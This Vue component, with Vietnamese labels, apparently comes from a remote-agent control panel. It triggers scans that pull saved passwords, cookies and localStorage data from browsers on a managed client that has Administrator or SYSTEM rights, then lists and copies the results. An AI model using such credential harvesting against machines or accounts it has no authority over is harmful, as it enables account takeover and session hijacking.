<template>
  <div class="mt-2">
    <WarningDisable permission="browser-credential" />

    <div class="flex gap-6">
      <div>
        <form class="mb-4 space-y-4" @submit="doSearch" @reset="resetFilter">
          <div class="space-y-2">
            <div>
              <legend>Loại credential</legend>
              <label class="select w-full md:w-fit 2xl:w-fit">
                <i class="fa-solid fa-tag text-base-content/80"></i>
                <select v-model="type" @change="loadResults">
                  <option value="password">Mật khẩu</option>
                  <option value="cookie">Cookie</option>
                  <option value="storage">Local Storage</option>
                </select>
              </label>
            </div>
            <div>
              <legend>Từ khóa</legend>
              <label class="input w-full md:w-fit 2xl:w-fit">
                <i class="fa-solid fa-magnifying-glass text-base-content/80"></i>
                <input type="text" placeholder="URL / domain / user" name="keyword" v-model="keyword" />
              </label>
            </div>
          </div>
          <div class="flex flex-wrap gap-2">
            <input class="btn btn-outline grow" type="reset" value="&#8635; Đặt lại" :disabled="loading" />
            <button class="btn btn-primary btn-outline grow" type="submit" :disabled="loading">
              &#10003; Áp dụng
            </button>
          </div>
        </form>
      </div>

      <div class="flex grow flex-col overflow-x-auto">
        <div class="card bg-base-100 shadow">
          <div class="card-body">
            <div class="flex items-center justify-between">
              <h2 class="card-title">
                <i class="fa-solid fa-key mr-2"></i>
                Mật khẩu trình duyệt
              </h2>
              <div class="flex gap-2">
                <PermissionInfo
                  v-if="privilegeLoaded && !canScan"
                  :message="`Thiếu quyền: agent phải có quyền Administrator hoặc SYSTEM để chạy Browser Credential (hiện tại: ${client_detail_store.client_detail?.privileges?.permission || 'không xác định'}).`"
                />
                <button
                  class="btn btn-primary btn-sm"
                  @click="startScan"
                  :disabled="scanning || !canScan"
                >
                  <span v-if="scanning" class="loading loading-spinner"></span>
                  <i v-else class="fa-solid fa-lock mr-1"></i>
                  Quét credential
                </button>
                <button class="btn btn-sm btn-outline" @click="loadResults" :disabled="loading">
                  <i class="fa-solid fa-refresh mr-1"></i> Làm mới
                </button>
              </div>
            </div>

            <div v-if="results.length > 0" class="stats stats-horizontal mb-4 shadow">
              <div class="stat">
                <div class="stat-title">Tổng kết quả</div>
                <div class="stat-value">{{ total_filter }}</div>
              </div>
            </div>

            <Loading v-if="loading" />

            <div v-else-if="results.length > 0" class="overflow-x-auto">
              <table class="table-pin-rows table">
                <thead>
                  <tr>
                    <th></th>
                    <th>{{ type === 'password' ? 'URL' : 'Domain' }}</th>
                    <th>Trình duyệt</th>
                    <th v-if="type === 'password'">User</th>
                    <th>Dữ liệu</th>
                    <th>Thời gian</th>
                  </tr>
                </thead>
                <tbody>
                  <tr v-for="(result, idx) in results" :key="result.id" class="hover">
                    <th>{{ Number(idx) + 1 }}</th>
                    <td>
                      <div class="max-w-64 truncate" :title="type === 'password' ? result.url : result.domain">
                        {{ type === 'password' ? result.url : result.domain }}
                      </div>
                    </td>
                    <td><span class="badge badge-ghost badge-sm">{{ result.browser || "N/A" }}</span></td>
                    <td v-if="type === 'password'">{{ result.user || "N/A" }}</td>
                    <td>
                      <div class="flex items-center gap-2">
                        <div class="max-w-80 truncate font-mono text-xs" :title="valueText(result)">
                          {{ valueText(result) }}
                        </div>
                        <button
                          v-if="valueText(result)"
                          type="button"
                          class="btn btn-ghost btn-xs"
                          :aria-label="copyLabel"
                          :title="copyLabel"
                          @click="copyTextToClipboard(valueText(result))"
                        >
                          <i class="fa-regular fa-copy"></i>
                        </button>
                      </div>
                    </td>
                    <td class="whitespace-nowrap">{{ dayjs(result.created).fromNow() }}</td>
                  </tr>
                </tbody>
              </table>
            </div>

            <div v-else class="alert alert-info">
              <i class="fa-solid fa-info-circle"></i>
              <span>Chưa có kết quả nào.</span>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</template>

<script setup lang="ts">
import Loading from "@/components/LoadingTemplate.vue";
import dayjs from "dayjs";
import { computed, onMounted, ref } from "vue";
import { useRoute } from "vue-router";
import { toast } from "vue3-toastify";
import { getBrowserCredentials } from "@/api/browserCredential";
import { copyTextToClipboard } from "@/types/util";
import WarningDisable from "../WarningDisable.vue";
import PermissionInfo from "../PermissionInfo.vue";
import { use_action } from "../ExplorerV2/useAction";
import { use_client_detail } from "../useClientDetail";

const route = useRoute();
const client_id = String(route.params.client_id);

const action_store = use_action();
const scanning = ref(false);
const client_detail_store = use_client_detail();
const privilegeLoaded = computed(() => client_detail_store.client_detail !== undefined);
const canScan = computed(() => {
  const permission = client_detail_store.client_detail?.privileges?.permission?.trim().toLowerCase();
  return permission === "administrator" || permission === "system";
});

const startScan = async () => {
  if (!canScan.value || scanning.value) return;
  try {
    scanning.value = true;
    const action_id = await action_store.create_action({
      type: "browser-credential",
      action: "scan",
    });
    if (!action_id) return;
    toast.success("Đã gửi yêu cầu quét mật khẩu trình duyệt!");
    action_store.watch_for_action(action_id, {
      on_complete: () => loadResults(),
    });
  } catch (error) {
    console.error(error);
    toast.error("Không thể tạo yêu cầu quét.");
  } finally {
    scanning.value = false;
  }
};

const loading = ref(false);
const results = ref<any[]>([]);
const total_filter = ref(0);
const type = ref<"password" | "cookie" | "storage">("password");
const keyword = ref("");
const copyLabel = computed(() =>
  `Sao chép ${type.value === "storage" ? "localStorage" : type.value === "cookie" ? "cookie" : "mật khẩu"}`,
);

onMounted(() => {
  loadResults();
});

const loadResults = async () => {
  try {
    loading.value = true;
    const { data, total_filter: total } = await getBrowserCredentials(
      client_id,
      undefined,
      1,
      100,
      keyword.value,
      type.value,
    );
    results.value = data || [];
    total_filter.value = total;
  } catch (error) {
    console.error(error);
    toast.error("Không thể tải kết quả!");
  } finally {
    loading.value = false;
  }
};

const valueText = (r: any): string => {
  if (type.value === "storage") {
    return r.storage;
  }
  return type.value === "cookie" ? r.cookie : r.password;
};

const doSearch = (e: Event) => {
  e.preventDefault();
  loadResults();
};

const resetFilter = () => {
  keyword.value = "";
  loadResults();
};
</script>
